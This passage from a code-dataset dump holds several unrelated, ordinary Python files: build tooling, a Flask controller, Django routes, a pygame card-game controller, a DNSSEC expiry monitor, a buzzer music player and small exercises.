ret_value\r\n\r\n    def code_analyze(self, file_path, test_mode=False):\r\n        print(file_path)\r\n\r\n        new_env = os.environ\r\n        if test_mode:\r\n            # get_devtls_path() returns a list of tool paths, so extend PATH entry by entry\r\n            crdswdevtls = self.get_devtls_path()\r\n            for item in crdswdevtls:\r\n                new_env['PATH'] = new_env['PATH'] + ';' + item\r\n\r\n        process = Popen([\"clang-tidy\",\r\n                         \"-checks=cert*\",\r\n                         \"-enable-check-profile\",\r\n                         \"-header-filter=^include\",\r\n                         file_path, \"--\"],\r\n                        stdin=PIPE, stdout=PIPE, stderr=PIPE, env=new_env)\r\n\r\n        # process = Popen([\"clang-tidy\", \"-checks=cert-*\", \"-enable-check-profile\", file_path, \"--\"]) #OK\r\n        # process = Popen([\"clang-tidy\", \"-checks=cert-*\", \"-enable-check-profile\", \"--\", \"-header-filter\" ,file_path])\r\n        # process = Popen([\"clang-tidy\", \"-enable-check-profile\", file_path])\r\n\r\n        stdout, stderr = process.communicate()\r\n\r\n        # if not test_mode:\r\n        #     file = open(\"build-flow.log\", 'a')\r\n        #     file.write(\"================================================================================\\n\")\r\n        #     file.write(file_path + '\\n')\r\n        #     file.write(\"--------------------------------------------------------------------------------\\n\")\r\n        #\r\n        #     pipe_output_str = reformat_pipe_output(stdout)\r\n        #     file.write(pipe_output_str)\r\n        #     file.write(\"--------------------------------------------------------------------------------\\n\")\r\n        #\r\n        #     pipe_output_str = reformat_pipe_output(stderr)\r\n        #     file.write(pipe_output_str)\r\n        #     file.write(\"--------------------------------------------------------------------------------\\n\")\r\n        #\r\n        #     file.close()\r\n\r\n\r\n\r\nclass MakePackage():\r\n    def __init__(self):\r\n        self.name = \"\"\r\n\r\n    \r\n\r\nclass Build():\r\n    def __init__(self):\r\n        self.name = \"\"\r\n\r\n    def create(self, cmakefile_folder, output_folder, build_type):\r\n        output_path = os.path.abspath(\r\n            os.path.join(output_folder, sys.platform))\r\n        input_path = os.path.abspath(cmakefile_folder)\r\n        print(\"Input = \" + input_path)\r\n        print(\"Output = \" + output_path)\r\n\r\n        process = None\r\n        if 'Windows' == platform.system():\r\n            process = Popen([\"cmake\", input_path, \"-B\" +\r\n                             output_path, \"-DCMAKE_BUILD_TYPE=\"+build_type, \"-G\", \"Visual Studio 15 2017\"])\r\n        else:\r\n            process = Popen([\"cmake\", input_path, \"-B\" +\r\n                             output_path, \"-DCMAKE_BUILD_TYPE=\"+build_type])\r\n        \r\n        stdout, stderr = process.communicate()\r\n\r\n\r\ndef main():\r\n    arguments = docopt(__doc__, version='build-flow 0.1a')\r\n\r\n    output_list = []\r\n    accepted_extname_list = [\".c\", \".cc\", \".cpp\", \".h\"]\r\n\r\n    if os.path.exists(\"build-flow.log\"):\r\n        os.remove(\"build-flow.log\")\r\n\r\n    build_flow_lint = Lint()\r\n    build_flow_build = Build()\r\n    build_flow_utility = Utility()\r\n\r\n    if arguments['lint']:\r\n        input_folder = arguments['<folder>']\r\n        print(\"lint command with input folder \", input_folder)\r\n\r\n        build_flow_utility.find_files(\r\n            input_folder, accepted_extname_list, output_list)\r\n        for file_path in output_list:\r\n            build_flow_lint.code_reformat(file_path)\r\n\r\n    elif arguments['lint-format']:\r\n        input_folder = arguments['<folder>']\r\n        print(\"lint-format command with input folder \", input_folder)\r\n        build_flow_utility.find_files(\r\n            input_folder, accepted_extname_list, output_list)\r\n        for file_path in output_list:\r\n            build_flow_lint.code_reformat(file_path)\r\n\r\n    elif arguments['lint-analyze']:\r\n        input_folder = arguments['<folder>']\r\n        print(\"lint-analyze command with input folder \", input_folder)\r\n        build_flow_utility.find_files(\r\n            input_folder, accepted_extname_list, output_list)\r\n        for file_path in output_list:\r\n            build_flow_lint.code_analyze(file_path)\r\n\r\n    elif arguments['path']:\r\n        input_folder = arguments['<folder>']\r\n        print(\"path command with input folder \", input_folder)\r\n        build_flow_utility.find_files(\r\n            input_folder, accepted_extname_list, output_list)\r\n        for file_path in output_list:\r\n            if not build_flow_utility.is_ascii_string(file_path):\r\n                print(file_path)\r\n\r\n    elif arguments['proj-create']:\r\n        input_target_path = arguments['<target>']\r\n        input_output_path = arguments['<output>']\r\n\r\n        input_build_type = 'Release'\r\n        if arguments['BUILD']:\r\n            if 'RELEASE' == arguments['BUILD'].upper():\r\n                input_build_type = 'Release'\r\n            elif 'DEBUG' == arguments['BUILD'].upper():\r\n                input_build_type = 'Debug'\r\n            elif 'RELWITHDEBINFO' == arguments['BUILD'].upper():\r\n                input_build_type = 'RelWithDebInfo'\r\n\r\n        print(\"proj-create command\")\r\n        print(\"<target> = \", input_target_path)\r\n        print(\"<output> = \", input_output_path)\r\n        print(\"[BUILD] = \", input_build_type)\r\n        build_flow_build.create(\r\n            input_target_path, input_output_path, input_build_type)\r\n\r\n    elif arguments['proj-build']:\r\n        input_target_path = arguments['<target>']\r\n        print(\"proj-build command\")\r\n        print(\"<target> = \", input_target_path)\r\n\r\n    else:\r\n        print(arguments)\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","sub_path":"Script/BuildFlow.py","file_name":"BuildFlow.py","file_ext":"py","file_size_in_byte":11053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"574354878","text":"import shutil\r\nimport os\r\n\r\ndef createFolder(directory):\r\n    try:\r\n        if not os.path.exists(directory):\r\n            os.makedirs(directory)\r\n    except OSError:\r\n        print('Error: Creating directory. ' + directory)\r\n\r\n\r\ndef copyXTimes(src, dst, x: int):\r\n    for i in range(1, x + 1):\r\n        shutil.copy(src, '{}{}.docx'.format(dst, str(i)))\r\n\r\n\r\n\r\n\r\n\r\n#copyXTimes('Shimpan Letters/4Dan Shimpan No Parking Letter.docx', 'Shimpan Letters/', 3)\r\n#createFolder('./name/')","sub_path":"UofT Tournament Maker Project/generatefiles.py","file_name":"generatefiles.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"554757556","text":"from flask import request\nfrom flask_restplus import Resource\n\nfrom ..util.dto import QuestionDto\nfrom ..service.question_service import QuestionService\n\napi = QuestionDto.api\n_question = QuestionDto.question\n\n\n@api.route(\"/<exam_id>\")\n@api.param(\"exam_id\", \"The Exam identifier\")\nclass QuestionList(Resource):\n    @api.doc(\"get questions\")\n    @api.marshal_list_with(_question, envelope=\"data\")\n    def get(self, exam_id):\n        \"\"\"List all registered questions of the given exam\"\"\"\n        service = QuestionService()\n        return service.read(exam_id)\n\n\n    @api.response(201, \"Question successfully created.\")\n    @api.doc(\"create a new question\")\n    @api.expect(_question, validate=True)\n    def post(self, exam_id):\n        \"\"\"Creates a new Question\"\"\"\n        service = QuestionService()\n        data = request.json\n        return service.save(data=data)\n","sub_path":"app/main/controller/question_controller.py","file_name":"question_controller.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"190280712","text":"from collections import deque\n\nmaterials = [int(x) for x in input().split()]\nmagic_levels = deque([int(x) for x in input().split()])\n\npresents_magic = {\n    150: 'Doll',\n    250: 'Wooden train',\n    300: 'Teddy bear',\n    400: 'Bicycle'\n}\n\npresents_made = {\n    'Doll': 0,\n    'Wooden train': 0,\n    'Teddy bear': 0,\n    'Bicycle': 0\n}\n\nwhile materials and magic_levels:\n    current_material = materials.pop()\n    current_magic = magic_levels.popleft()\n\n    if current_material == 0 and current_magic == 0:\n        continue\n    if current_material == 0:\n        magic_levels.appendleft(current_magic)\n        continue\n    if current_magic == 0:\n        materials.append(current_material)\n        continue\n\n    total_magic = current_magic * current_material\n    if total_magic in presents_magic:\n        present = presents_magic[total_magic]\n        presents_made[present] += 1\n    elif total_magic < 0:\n        new_sum = current_magic + current_material\n        materials.append(new_sum)\n    elif total_magic not in presents_magic and total_magic > 0:\n        current_material += 15\n        materials.append(current_material)\n\ncondition_one = presents_made['Doll'] >= 1 and presents_made['Wooden train'] >= 1\ncondition_two = presents_made['Teddy bear'] >= 1 and presents_made['Bicycle'] >= 1\n\nif condition_one or condition_two:\n    print(\"The presents are crafted! 
Merry Christmas!\")\nelse:\n    print(\"No presents this Christmas!\")\n\nif materials:\n    print(f'Materials left: {\", \".join(str(x) for x in reversed(materials))}')\nif magic_levels:\n    print(f'Magic left: {\", \".join(str(x) for x in magic_levels)}')\n\n[print(f'{present}: {count}') for present, count in sorted(presents_made.items()) if count > 0]\n","sub_path":"Exams/Exam_Preparation_17_February_2020/01_santas_present_factory.py","file_name":"01_santas_present_factory.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"84072684","text":"#!/usr/bin/env python\n\n\"\"\"\nSome package to control the base of a turtlebot\n\"\"\"\n\nimport rospy\nimport actionlib\nfrom smach import State, StateMachine, Concurrence, Container, UserData\nfrom move_base_msgs.msg import MoveBaseAction\nfrom smach_ros import MonitorState, ServiceState, SimpleActionState, IntrospectionServer\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import Float32\nfrom nodes.setup_services import setup_environment\n\n\n\nclass Stop(State):\n\n    def __init__(self):\n        State.__init__(self, outcomes=['succeeded', 'aborted', 'preempted'])\n\n    def execute(self, userdata):\n        rospy.loginfo('Shutting down the state machine')\n        return 'succeeded'\n\n\nclass BasicNav(State):\n\n    def __init__(self):\n        # Basic setup\n        rospy.init_node('sample_nav', anonymous=False)\n        rospy.on_shutdown(self.shutdown)\n\n        # Set the low battery value\n        self.low_battery_threshold = rospy.get_param(\"~low_battery_threshold\", 25)\n\n        # Set the time allotted for the robot to get to a goal\n        self.move_base_timeout = rospy.get_param(\"~move_base_timeout\", 20)\n\n        # Create the move_base action client\n        self.move_base = actionlib.SimpleActionClient(\"move_base\", MoveBaseAction)\n        rospy.loginfo('Waiting for the move_base server up to 60 seconds')\n\n        # Waits up to 60 seconds for the rest of the nodes to start\n        self.move_base.wait_for_server(rospy.Duration(60))\n        rospy.loginfo('Connected to the move_base server')\n\n        # Sets up the basic ROS move actions\n        self.cmd_vel_pub = rospy.Publisher('cmd_vel', Twist)\n\n\n\n\n    def shutdown(self):\n        rospy.loginfo('The robot is shutting down!')\n        self.cmd_vel_pub.publish(Twist())\n        rospy.sleep(1)\n\n\nif __name__ == '__main__':\n    try:\n        BasicNav()\n    except rospy.ROSInterruptException:\n        rospy.logwarn('The system is shutting down!')","sub_path":"nodes/BasicNav.py","file_name":"BasicNav.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"322128544","text":"\n\n#class header\nclass _REALISTICALLY():\n\tdef __init__(self): \n\t\tself.name = \"REALISTICALLY\"\n\t\tself.definitions = [u'according to the facts and what is possible: ', u'in a way that seems as if it exists: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adverbs'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adverbs/_realistically.py","file_name":"_realistically.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"349270592","text":"#!/usr/bin/env python3\n\n# using if\nprint(\"\\nif example:\")\nx = 5\nif x:\n    print(\"x is nonzero\")\n\nlines = 500\n\nif lines < 
1000:\n    print(\"lines is small\")\nelif lines < 10000:\n    print(\"lines is medium\")\nelse:\n    print(\"lines is large\")\n\n\n# using while\nprint(\"\\nwhile example:\")\nseries = [\"The big bang theory\", \"White collar\", \"Prison break\"]\ni = 0\nwhile i < len(series):\n    print(\"series: \", series[i])\n    i += 1\n\nseries = [\"White collar\", \"The big bang theory\", \"Prison break\"]\ni = 0\nwhile i < len(series):\n    if \"theory\" in str(series[i]):\n        print(\"best to watch is\", series[i])\n        break\n    print(\"not yet\")\n    i += 1\n\n# using for ... in\nprint(\"\\nfor ... in example:\")\n\ncountries = [\"Denmark\", \"Finland\", \"Norway\"]\n\nfor country in countries:\n    print(country)\n\nfor letter in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n    if letter in \"AEIOU\":\n        print(letter, \"is a vowel\")\n    else:\n        print(letter, \"is a consonant\")\n","sub_path":"cp-01-introducao-a-programacao-procedural/flux_controll.py","file_name":"flux_controll.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"579426357","text":"from django.conf.urls import patterns, include, url\nfrom accounts.views import index, home, log_in, register, log_out, all_exercises, each_exercise, profile, give_session, account_status\nfrom user_code.views import result, post_result\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Examples:\n    url(r'^$', index, name=\"index\"),\n    # url(r'^home$', home, name=\"home\"),\n    url(r'^admin', include(admin.site.urls)),\n)\n\n\nurlpatterns += patterns('',\n    url(r'^session$', give_session, name=\"sesson\"),\n    url(r'^account_status$', account_status, name=\"account_status\"),\n    \n    # url(r'^profile$', profile, name=\"profile\"),\n    url(r'^login$', log_in, name=\"log_in\"),\n    url(r'^register$', register, name=\"register\"),\n    url(r'^logout$', log_out, name=\"log_out\"),\n    )\n\nurlpatterns += patterns('',\n    url(r'^exercise/_all$', all_exercises, name ='all_exercises'),\n    url(r'^exercise/(?P<exercise_name>[-\\w]+)$', each_exercise, name ='each_exercise'),\n)\n\nurlpatterns += patterns('',\n    url(r'^code', include('user_code.urls', namespace=\"user_code\")),\n    url(r'^post_result$', post_result, name ='post_result'),\n    url(r'^result$', result, name ='result'),\n)\n","sub_path":"pmc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"238366593","text":"import pygame\nimport sys\nfrom random import randint\nfrom pygame.locals import *\n\nclass Edge():\n\n    def __init__(self, source, sink, capacity):\n        self.source = source\n        self.sink = sink\n        self.capacity = capacity\n\nclass FlowNetwork():\n\n    def __init__(self):\n        self.adj = {}\n        self.flow = {}\n\n    def add_vertex(self, vertex):\n        self.adj[vertex] = []\n\n    def get_edges(self, vertex):\n        return self.adj[vertex]\n\n    def add_edge(self, source, sink, capacity):\n        edge = Edge(source, sink, capacity)\n        # the residual edge runs in the opposite direction, sink -> source\n        redge = Edge(sink, source, 0)\n        edge.redge = redge\n        redge.redge = edge\n        self.adj[source].append(edge)\n        self.adj[sink].append(redge)\n        self.flow[edge] = 0\n        self.flow[redge] = 0\n\n    def find_path(self, source, sink, path):\n        if source == sink:\n            return path\n        for edge in self.get_edges(source):\n            residual = edge.capacity - self.flow[edge]\n            if residual > 0 and edge not in path:\n                result = self.find_path(edge.sink, sink, path + [edge])\n                if result != None:\n                    return result\n\n    def max_flow(self, source, sink):\n        path = 
self.find_path(source, sink, [])\n while path != None:\n residuals = [edge.capacity - self.flow[edge] for edge in path]\n flow = min(residuals)\n for edge in path:\n self.flow[edge] += flow\n self.flow[edge.redge] -= flow\n path = self.find_path(source, sink, [])\n return sum(self.flow[edge] for edge in self.get_edges(source))\n\nclass Vertex():\n\n def __init__(self):\n self.id = randint(0, 1000)\n\n def __eq__(self, other):\n return self.id == other.id\n\n def __hash__(self):\n return self.id\n\n\nclass Controller():\n\n def __init__(self, game):\n self.game = game\n self.choose_attackers = False\n self.choose_blockers = False\n self.choose_target = False\n self.waiting_for_choice = False\n\n def auto_cast(self, card):\n if not self.game.actions.castable(card) or self.game.actions.cast(card):\n return\n g = FlowNetwork()\n source = Vertex()\n sink = Vertex()\n g.add_vertex(source)\n g.add_vertex(sink)\n splitmana = card.manapool.split()\n for mana in splitmana:\n vertex = Vertex()\n mana.vertex = vertex\n g.add_vertex(vertex)\n g.add_edge(vertex, sink, 1)\n for card_on_board in self.player.board.cards:\n for activate in card_on_board.activations:\n vertex = Vertex()\n vertex.activate = activate\n g.add_vertex(vertex)\n g.add_edge(source, vertex, 1)\n if activate.manasource and self.game.actions.activate_able(activate):\n for mana in activate.produce.split():\n for m in splitmana:\n if mana.enough(m):\n g.add_edge(vertex, m.vertex, 1)\n if g.max_flow(source, sink) == card.manapool.converted_mana_cost():\n for mana in splitmana:\n for edge in g.get_edges(mana.vertex):\n if g.flow[edge.redge] > 0:\n self.game.actions.activate(edge.source.activate)\n self.game.actions.cast(card)\n\nclass BotController(Controller):\n\n def __init__(self, game):\n super().__init__(game)\n self.aggressor = True\n\n def choose_target_view(self):\n self.choose_target = False\n card = self.game.actions.waiting_for_target.choose(self.player.targets.cards)\n self.game.actions.choose_target(card)\n\n def choose_blockers_view(self):\n self.choose_blockers = False\n blockers = []\n attackers = []\n for card in self.game.get_turn().board.cards:\n if card.attacking:\n attackers.append(card)\n for card in self.player.board.cards:\n for attacker in attackers:\n if self.game.actions.able_to_block(attacker, card):\n if attacker.get_power() < (card.get_toughness() - card.damage):\n blockers.append((card, attacker))\n attackers.remove(attacker)\n break\n self.game.actions.choose_blockers(blockers)\n\n#TODO\n def choice_view(self):\n self.waiting_for_choice = False\n self.game.actions.choose_may_add_to_stack(True)\n\n def choose_attackers_view(self):\n self.choose_attackers = False\n cards = []\n for card in self.player.board.cards:\n attack = True\n if self.game.actions.able_to_attack(card):\n for opp_card in self.game.get_opponent(self.player).board.cards:\n if self.game.actions.able_to_block(card, opp_card):\n if card.get_power() >= (opp_card.get_toughness() - opp_card.damage):\n if (not self.aggressor and\n (card.get_toughness() - card.damage) <= opp_card.get_power()):\n attack = False\n break\n else:\n attack = False\n break\n if attack:\n cards.append(card)\n self.game.actions.choose_attackers(cards)\n\n def prio(self):\n for card in self.player.hand.cards:\n if card.manapool.converted_mana_cost() == 0:\n if self.game.actions.castable(card):\n self.game.actions.cast(card)\n hand = sorted(self.player.hand.cards,\n key=lambda x: x.manapool.converted_mana_cost(), reverse=True)\n for card in hand:\n self.auto_cast(card)\n 
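# every affordable card has been tried; hand priority back to the game\n        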
self.game.pass_prio()\n\n\nclass PlayerController(Controller):\n\n def __init__(self, game, cardsurfaces, gamezonebuttons):\n super().__init__(game)\n self.cardsurfaces = cardsurfaces\n self.attackers = []\n self.blockers = []\n self.blocker = None\n self.gamezonebuttons = gamezonebuttons\n\n def choose_blockers_view(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n if event.type == KEYUP:\n if event.key == K_SPACE:\n self.game.actions.choose_blockers(self.blockers)\n self.blockers = []\n self.choose_blockers = False\n self.cardsurfaces.remove_selected()\n self.blocker = None\n if event.type == MOUSEBUTTONUP:\n surface = self.cardsurfaces.card_at_coordinates(pygame.mouse.get_pos())\n if surface != None:\n card = surface.card\n if (self.blocker == None and\n card.owner == self.player):\n surface.selected = True\n self.blocker = card\n elif (self.blocker != None and\n self.game.actions.able_to_block(card, self.blocker)):\n surface.selected = True\n self.blockers.append((self.blocker, card))\n self.blocker = None\n#TODO\n def choice_view(self):\n for event in pygame.event.get():\n if event.type == KEYUP:\n if event.key == K_y:\n self.waiting_for_choice = False\n self.game.actions.choose_may_add_to_stack(True)\n if event.key == K_n:\n self.waiting_for_choice = False\n self.game.actions.choose_may_add_to_stack(False)\n\n def choose_attackers_view(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n if event.type == KEYUP:\n if event.key == K_SPACE:\n self.game.actions.choose_attackers(self.attackers)\n self.attackers = []\n self.choose_attackers = False\n self.cardsurfaces.remove_selected()\n if event.type == MOUSEBUTTONUP:\n surface = self.cardsurfaces.card_at_coordinates(pygame.mouse.get_pos())\n if surface != None and self.game.actions.able_to_attack(surface.card):\n surface.selected = True\n self.attackers.append(surface.card)\n\n def choose_target_view(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n if event.type == MOUSEBUTTONUP:\n surface = self.cardsurfaces.card_at_coordinates(pygame.mouse.get_pos())\n if surface != None and self.player.targets.contains(surface.card):\n self.choose_target = False\n self.game.actions.choose_target(surface.card)\n\n def prio(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n if event.type == KEYUP:\n if event.key == K_SPACE:\n self.game.pass_prio()\n if event.type == MOUSEBUTTONUP:\n surface = self.cardsurfaces.card_at_coordinates(pygame.mouse.get_pos())\n if surface != None:\n card = surface.card\n if (card.owner.hand.contains(card) and\n self.game.actions.castable(card)):\n self.auto_cast(card)\n elif card.owner.board.contains(card):\n for activation in card.activations:\n if self.game.actions.activate_able(activation):\n self.game.actions.activate(activation)\n self.gamezonebuttons.check_and_hit_button(pygame.mouse.get_pos())\n\n","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":9977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"376357887","text":"import cx_Freeze\n\nexecutables = [cx_Freeze.Executable(\"maze-game.py\")]\n\ncx_Freeze.setup(\n name=\"Block Maze\",\n options={\"build_exe\":{\"packages\":[\"pygame\"],\"include_files\":[\"../data/img\", \"../data/fonts\"]}},\n\n description = \"Block Maze Game\",\n executables = executables\n 
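# the frozen app is then produced by running: python setup.py build\r\n    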
)\n","sub_path":"block-maze-master/src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"238450345","text":"#! /usr/bin/env python\nimport json\n\nfrom kd_database import KDDatabase\nfrom utils import resolve_filepath, print_error\n\nclass PluginManager:\n def __init__(self):\n self.db = None\n self.plugins = {}\n\n def insert_basic_world(self):\n with open(resolve_filepath('', 'kd_world.json'), 'r') as kd_world_file:\n world = json.load(kd_world_file)\n for key, model_data in world['models'].items():\n self.db.insert_model(key, model_data)\n for key, entity_data in world['entities'].items():\n self.db.insert_entity(key, entity_data)\n\n def config_db(self):\n with open(resolve_filepath('', 'config.json')) as config_file:\n db_config = json.load(config_file)['db']\n db_mode = KDDatabase.DEVELOPMENT_MODE\n if db_config['mode'] == 'test':\n db_mode = KDDatabase.TEST_MODE\n elif db_config['mode'] == 'production':\n db_mode = KDDatabase.PRODUCTION_MODE\n self.db = KDDatabase(\n host=db_config['host'],\n port=db_config['port'],\n name=db_config['name'],\n user=db_config['user'],\n password=db_config['password'],\n mode=db_mode\n )\n self.db.config()\n self.insert_basic_world()\n \n def config_plugins(self):\n with open(resolve_filepath('', 'config.json')) as config_file:\n for plugin_name in json.load(config_file)['plugins']:\n self.plugins[plugin_name] = {\n 'node': None,\n 'process': None\n }\n\n def start(self):\n self.config_db()\n self.config_plugins()\n","sub_path":"scripts/plugin_management/plugin_manager.py","file_name":"plugin_manager.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"145192225","text":"#!/usr/bin/env python\nimport sys\nimport argparse\nimport dns.message\nimport dns.query\nimport datetime\n\nNAGIOS_LEVEL = {'OK': 0,\n 'WARNING': 1,\n 'CRITICAL': 2}\nRRSIG_DATES = {'CURRENT': 0,\n 'WARNING': 8,\n 'CRITICAL': 6}\n\n\ndef _exit(code, message):\n print(message)\n sys.exit(code)\n\n\ndef parse_arg():\n parser = argparse.ArgumentParser()\n parser.add_argument('nameserver', help='nameserver ip address')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_arg()\n server = args.nameserver\n\n request = dns.message.make_query('fhsu.edu', dns.rdatatype.RRSIG)\n response = dns.query.udp(request, server)\n\n answer = response.answer[0]\n type = answer.items[0]\n expiration_date = datetime.datetime.fromtimestamp(type.expiration)\n inception_date = datetime.datetime.fromtimestamp(type.inception)\n\n now = datetime.datetime.now()\n\n difference = expiration_date - now\n RRSIG_DATES['CURRENT'] = difference.days\n status_message = 'rrsig {} days until expiration.'.format(difference.days)\n additional_status_message = 'Expiration date {}\\nUpdated {}'.format(expiration_date.isoformat(),\n inception_date.isoformat())\n\n pref_data = 'Expiration={CURRENT}c;{WARNING};{CRITICAL};0;30'.format(**RRSIG_DATES)\n if difference.days < RRSIG_DATES['CRITICAL']:\n status = 'CRITICAL'\n elif difference.days < RRSIG_DATES['WARNING'] :\n status = 'WARNING'\n else:\n status = 'OK'\n return_message = '{}: {}|{}\\n{}'.format(status, status_message, pref_data, additional_status_message)\n _exit(NAGIOS_LEVEL[status], return_message)\n\nif __name__ == \"__main__\":\n 
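# exit status follows the Nagios convention defined in NAGIOS_LEVEL above (0=OK, 1=WARNING, 2=CRITICAL)\n    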
main()\n","sub_path":"check_dnssec.py","file_name":"check_dnssec.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"378694183","text":"import pwm\nimport threading\n# thread(), sleep(), MICROS and PRIO_LOWEST are builtins of the embedded (Zerynth-style) runtime\n\nLOW_NOTE_FREQUENCY = 466 # Bb\nHIGH_NOTE_FREQUENCY = 622 # Eb\n\nTEMPO = 120 # bpm\n\n_E4 = 1000000// 330\n_G4 = 1000000// 392\n_A4 = 1000000// 440\n_Ad4= 1000000// 466\n_B4 = 1000000// 494\n_C5 = 1000000// 523\n_Cd5= 1000000// 554\n_D5 = 1000000// 587\n_E5 = 1000000// 659\n_Fd5= 1000000// 698\n_G5 = 1000000// 784\n_A5 = 1000000// 880\n_B5 = 1000000// 988\n_D6 = 1000000// 1175\n\n# Don't start now - Dua Lipa (BassLine)\nmusicSheets = [\n    (_E4, 1), (_E5, 1/2, True), (_E4, 3/2), (_E5, 1/2, True), (_A4, 1/4), (_Ad4, 1/4),\n    (_B4, 1), (_B5, 1/2, True), (_B4, 1, True), (_B4, 1/4, True), (_B4, 1/4, True), (_Fd5, 1/4), (_E5, 1/4, True), (_D5, 1/4, True), (_B4, 1/4, True),\n    (_G4, 1), (_G5, 1/2, True), (_G4, 3/2), (_G5, 1/2, True), (_C5, 1/4), (_Cd5, 1/4),\n    (_D5, 1), (_D6, 1/2, True), (_A4, 3/2), (_A5, 1/2, True), (0, 1/2, True)\n    ]\n    \ndef startStop(buzzer):\n    if buzzer.playMusic.is_set():\n        buzzer.playMusic.clear()\n    else:\n        buzzer.playMusic.set()\n    \n\nclass Buzzer:\n    \n    # In microseconds, as integers\n    lowNotePeriod = 1000000//LOW_NOTE_FREQUENCY\n    highNotePeriod = 1000000//HIGH_NOTE_FREQUENCY\n    \n    def __init__(self, buzzerPin, modeHandler):\n        self.buzzerPin = buzzerPin\n        self.modeHandler = modeHandler\n        self.length = 60000//TEMPO\n        self.playMusic = threading.Event()\n        self.musicThread = thread(self.playSong, prio=PRIO_LOWEST)\n        self.lock = threading.Lock()\n    \n    \n    # Sound played when the LED turns on\n    def playTurnOn(self):\n        self.playMusic.clear()\n        self.lock.acquire()\n        \n        # Set the buzzer period and a 50% duty cycle\n        if not self.modeHandler.muted:\n            p = self.lowNotePeriod\n            pwm.write(self.buzzerPin, p, p//2, MICROS)\n            sleep(200) \n            p = self.highNotePeriod\n            pwm.write(self.buzzerPin, p, p//2, MICROS)\n            sleep(300)\n        \n        pwm.write(self.buzzerPin, 0, 0, MICROS)\n        self.lock.release()\n    \n    \n    # Sound played when the LED turns off\n    def playTurnOff(self):\n        self.playMusic.clear()\n        self.lock.acquire()\n        \n        if not self.modeHandler.muted:\n            p = self.highNotePeriod\n            pwm.write(self.buzzerPin, p, p//2, MICROS)\n            sleep(200) \n            p = self.lowNotePeriod\n            pwm.write(self.buzzerPin, p, p//2, MICROS)\n            sleep(300)\n        \n        pwm.write(self.buzzerPin, 0, 0, MICROS)\n        self.lock.release()\n    \n    \n    def playSong(self):\n        while(True):\n            self.playMusic.wait()\n            self.lock.acquire()\n            i = 0\n            while self.playMusic.is_set() and i < len(musicSheets):\n                # entries are (note, size) or (note, size, dotted); default dotted to False\n                note, size = musicSheets[i][0], musicSheets[i][1]\n                dotted = musicSheets[i][2] if len(musicSheets[i]) > 2 else False\n                if dotted != True:\n                    pwm.write(self.buzzerPin, note, note//2, MICROS)\n                    sleep(int(size*self.length))\n                else:\n                    pwm.write(self.buzzerPin, note, note//2, MICROS)\n                    sleep(int(1/2*size*self.length))\n                    pwm.write(self.buzzerPin, 0, 0, MICROS)\n                    sleep(int(1/2*size*self.length))\n                i += 1\n                i %= len(musicSheets)\n            pwm.write(self.buzzerPin, 0, 0, MICROS)\n            self.lock.release()\n    \n","sub_path":"buzzerFeedback.py","file_name":"buzzerFeedback.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"584257511","text":"from __future__ import print_function\nimport torch.utils.data as data\nimport os\nimport os.path\nimport torch\nimport numpy as np\nfrom torch.autograd import Variable\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom skimage import segmentation\nimport 
